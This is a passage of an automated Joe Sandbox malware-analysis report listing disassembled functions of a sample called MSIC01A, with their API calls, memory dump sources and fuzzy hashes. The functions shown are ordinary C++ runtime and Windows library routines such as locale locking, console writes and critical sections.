                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42CAC
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42CCC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 1067678da9da8b224384e56479c4edb1ad803cfbbba5ebc044502e784d1f4d2f
                                                                                                                                                                        • Instruction ID: 18066facfc310acf9f892b381b8357230f48d7354ae179bb3c25c57d427d0f86
                                                                                                                                                                        • Opcode Fuzzy Hash: 1067678da9da8b224384e56479c4edb1ad803cfbbba5ebc044502e784d1f4d2f
                                                                                                                                                                        • Instruction Fuzzy Hash: DA01C035901219DBCB15EBA89C816BE7BA0AF80730F250419FA106B3D2CF789E01BB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F42E9E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42EA5
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42EAF
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42F00
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42F20
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 593ef2adb51cacdf4f9a065b53df5ffaceb238e0abfb2c69f02224e7bcbb619a
                                                                                                                                                                        • Instruction ID: af66b203ffaf989b298bd33322cc3cd7dcddd86842dfad7460ed29276f719b0f
                                                                                                                                                                        • Opcode Fuzzy Hash: 593ef2adb51cacdf4f9a065b53df5ffaceb238e0abfb2c69f02224e7bcbb619a
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A01D231900219DBCB05EB64DC41ABE7B70BF80720F640459F914AB2D2CF789E05FB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F42E09 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42E10
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42E1A
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42E6B
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42E8B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: da6f2a6c327c3850944594b39d306414b56ba4033021874b4c2fec8719f6127f
                                                                                                                                                                        • Instruction ID: 42cd417f7ed3b727901e139567ca4c4debd4a8afeb01891daa9667f7a953831a
                                                                                                                                                                        • Opcode Fuzzy Hash: da6f2a6c327c3850944594b39d306414b56ba4033021874b4c2fec8719f6127f
                                                                                                                                                                        • Instruction Fuzzy Hash: C701C432900619DBCB05EB64CC41ABE7B61BF94760F240959FD146B2D2CF789E05AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F42F33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42F3A
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42F44
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42F95
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42FB5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 7325409ab48030eec458f766c0680f65d1f0d6fe7bc8787080a7118726776d40
                                                                                                                                                                        • Instruction ID: d273f61df5bbd8bce04d0fc89b86185f8265fea8a235cc7fd53743a7070d9db4
                                                                                                                                                                        • Opcode Fuzzy Hash: 7325409ab48030eec458f766c0680f65d1f0d6fe7bc8787080a7118726776d40
                                                                                                                                                                        • Instruction Fuzzy Hash: 6101C431A00519DBCB05EBA49C416BEBB71BF84730F640559F9046B3D2CF789E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F73686 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000), ref: 00F7369D
                                                                                                                                                                        • GetLastError.KERNEL32(?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000,?,?,?,00F7271F,?), ref: 00F736A9
                                                                                                                                                                          • Part of subcall function 00F7366F: CloseHandle.KERNEL32(FFFFFFFE,00F736B9,?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000,?,?), ref: 00F7367F
                                                                                                                                                                        • ___initconout.LIBCMT ref: 00F736B9
                                                                                                                                                                          • Part of subcall function 00F73631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F73660,00F73040,?,?,00F72198,?,?,00000000,?), ref: 00F73644
                                                                                                                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000,?), ref: 00F736CE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2744216297-0
                                                                                                                                                                        • Opcode ID: 7600343d96cf7cbcfadc6a4d8b011323be3dce8e084e2842d37f7c7539e989d9
                                                                                                                                                                        • Instruction ID: f5ca51e0338b9d00041cd7796d80c5cdc0057c86349d89a1316fcabd0ae4d597
                                                                                                                                                                        • Opcode Fuzzy Hash: 7600343d96cf7cbcfadc6a4d8b011323be3dce8e084e2842d37f7c7539e989d9
                                                                                                                                                                        • Instruction Fuzzy Hash: 4FF0AC3651425CBBCF626F95EC05D993F66FB087B1B448061FE1D96220D6328960FB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F52D20 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SleepConditionVariableCS.KERNELBASE(?,00F52CBD,00000064), ref: 00F52D43
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F52CBD,00000064,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52D4D
                                                                                                                                                                        • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00F52CBD,00000064,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52D5E
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00F8DD3C,?,00F52CBD,00000064,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52D65
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3269011525-0
                                                                                                                                                                        • Opcode ID: adac9c210c07a0ec124efee90b6e29fa1af94c85e0af973fd1d756bd85735b26
                                                                                                                                                                        • Instruction ID: e2d7ead1b0fd70ef689d82a66bbe3cec9c82fbd8f237ffe6eb7588f862aafd12
                                                                                                                                                                        • Opcode Fuzzy Hash: adac9c210c07a0ec124efee90b6e29fa1af94c85e0af973fd1d756bd85735b26
                                                                                                                                                                        • Instruction Fuzzy Hash: 9DE0123355562CBBCB163B54EC08ADA7F39BF05B61B010051FA0A661B2D7615941BBD3
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3EC87 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F3EC8E
                                                                                                                                                                          • Part of subcall function 00F3D87C: __EH_prolog3.LIBCMT ref: 00F3D883
                                                                                                                                                                          • Part of subcall function 00F3D87C: std::_Lockit::_Lockit.LIBCPMT ref: 00F3D88D
                                                                                                                                                                          • Part of subcall function 00F3D87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D8FE
                                                                                                                                                                        • _Find_elem.LIBCPMT ref: 00F3EE8A
                                                                                                                                                                        Strings
                                                                                                                                                                        • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F3ECF6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                        • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                        • API String ID: 2544715827-2799312399
                                                                                                                                                                        • Opcode ID: d3ed3ce00de6da83f4c1a4a2663802c2088fc254ec2b4527ae4029f96cb5b519
                                                                                                                                                                        • Instruction ID: b28642ffa36305a222e5ac1d4080302da44ae99ce4763b21f33fb81c7f325061
                                                                                                                                                                        • Opcode Fuzzy Hash: d3ed3ce00de6da83f4c1a4a2663802c2088fc254ec2b4527ae4029f96cb5b519
                                                                                                                                                                        • Instruction Fuzzy Hash: 56C18F35E042889EDF25DBB8C8407ECBBB2AF55320F294069E8856B3C7C7749D85EB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F462BE Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F462C8
                                                                                                                                                                          • Part of subcall function 00F42D74: __EH_prolog3.LIBCMT ref: 00F42D7B
                                                                                                                                                                          • Part of subcall function 00F42D74: std::_Lockit::_Lockit.LIBCPMT ref: 00F42D85
                                                                                                                                                                          • Part of subcall function 00F42D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00F42DF6
                                                                                                                                                                        • _Find_elem.LIBCPMT ref: 00F46502
                                                                                                                                                                        Strings
                                                                                                                                                                        • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F4633F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                        • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                        • API String ID: 2544715827-2799312399
                                                                                                                                                                        • Opcode ID: 028d0d592a0552ecc1357c9bc8303b4b20c0b78e03a9b4be12bb49d4cfdf7f21
                                                                                                                                                                        • Instruction ID: 0fa03c27b7eaf24da48848d151da7b90cd2649181cb596d69bc7419f967b0e09
                                                                                                                                                                        • Opcode Fuzzy Hash: 028d0d592a0552ecc1357c9bc8303b4b20c0b78e03a9b4be12bb49d4cfdf7f21
                                                                                                                                                                        • Instruction Fuzzy Hash: 40C19370E042588ADF25DF68C8417BCBFB1BF16314F588099DC89EB286DB349C85EB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F46694 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F4669E
                                                                                                                                                                          • Part of subcall function 00F3B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00F3B8DD
                                                                                                                                                                          • Part of subcall function 00F3B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00F3B900
                                                                                                                                                                          • Part of subcall function 00F3B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B928
                                                                                                                                                                          • Part of subcall function 00F3B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B9B7
                                                                                                                                                                        • _Find_elem.LIBCPMT ref: 00F468D8
                                                                                                                                                                        Strings
                                                                                                                                                                        • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F46715
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                        • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                        • API String ID: 3042121994-2799312399
                                                                                                                                                                        • Opcode ID: 01fcb1838a07d193ea8efc2226609bd96879ed11dc4e1a4ac537a093feb20da4
                                                                                                                                                                        • Instruction ID: 0ac4b3745aa7a34a63068922a4012f1bac3030f2d7185fefaa1111a051f2357d
                                                                                                                                                                        • Opcode Fuzzy Hash: 01fcb1838a07d193ea8efc2226609bd96879ed11dc4e1a4ac537a093feb20da4
                                                                                                                                                                        • Instruction Fuzzy Hash: 25C18130E042588BDF25DF64C8517ACBFB2BF12314F548099DC89EB282DB788D85EB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F61A6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00F61AFD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                                                        • String ID: pow
                                                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                                                        • Opcode ID: dc2709dc918e9e76310cf78198a6a277b94c5e44d2fa57aa3803b8a9c77382eb
                                                                                                                                                                        • Instruction ID: 5bf0a6f4a5c5073ab4dd1a24a1eaf3a91e0ed5e973ecf3bfe86dc056544bf0d1
                                                                                                                                                                        • Opcode Fuzzy Hash: dc2709dc918e9e76310cf78198a6a277b94c5e44d2fa57aa3803b8a9c77382eb
                                                                                                                                                                        • Instruction Fuzzy Hash: 97515C61E49205CACB117754CE1237E77A0FB40721F284958E0D5922A9FA3A8CD5BE87
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F51E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldiv
                                                                                                                                                                        • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                        • API String ID: 3732870572-1956417402
                                                                                                                                                                        • Opcode ID: 194e6d676b7896fc27234fba76c0aa4acfd93a59577db7df8cae8972153aa65d
                                                                                                                                                                        • Instruction ID: b5b19d3837358485fb38d125b9cff2d672e449445ab5f4d94370fb687a996228
                                                                                                                                                                        • Opcode Fuzzy Hash: 194e6d676b7896fc27234fba76c0aa4acfd93a59577db7df8cae8972153aa65d
                                                                                                                                                                        • Instruction Fuzzy Hash: BC512230F04284ABDB258E6C88817BE7FF57F46362F14415AEE81D7281C374A94AE760
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3BD90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00F3BF6E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                        • API String ID: 118556049-2658103896
                                                                                                                                                                        • Opcode ID: 3438cc7b02cfc3b665b2b0267e9f91f872c6f167da73d32409b4b5f45dda45e4
                                                                                                                                                                        • Instruction ID: 4c0b20f3768451d753a935661439597ab0e5da1f14d57ad2ad47b8c33471abe5
                                                                                                                                                                        • Opcode Fuzzy Hash: 3438cc7b02cfc3b665b2b0267e9f91f872c6f167da73d32409b4b5f45dda45e4
                                                                                                                                                                        • Instruction Fuzzy Hash: 0951C3B1D007489FDB10DFA4CC41BEEBBB8FF05314F14426AE905AB241E774AA85DB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F370A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \\?\$\\?\UNC\
                                                                                                                                                                        • API String ID: 0-3019864461
                                                                                                                                                                        • Opcode ID: b3799a7538d38035ffcc9266724ddf971b42c088090bd8e8fc43303388dd98c2
                                                                                                                                                                        • Instruction ID: 5c8a718c065953b5729153001b842001ddaf64e9f65ce919f837978c3a0fc526
                                                                                                                                                                        • Opcode Fuzzy Hash: b3799a7538d38035ffcc9266724ddf971b42c088090bd8e8fc43303388dd98c2
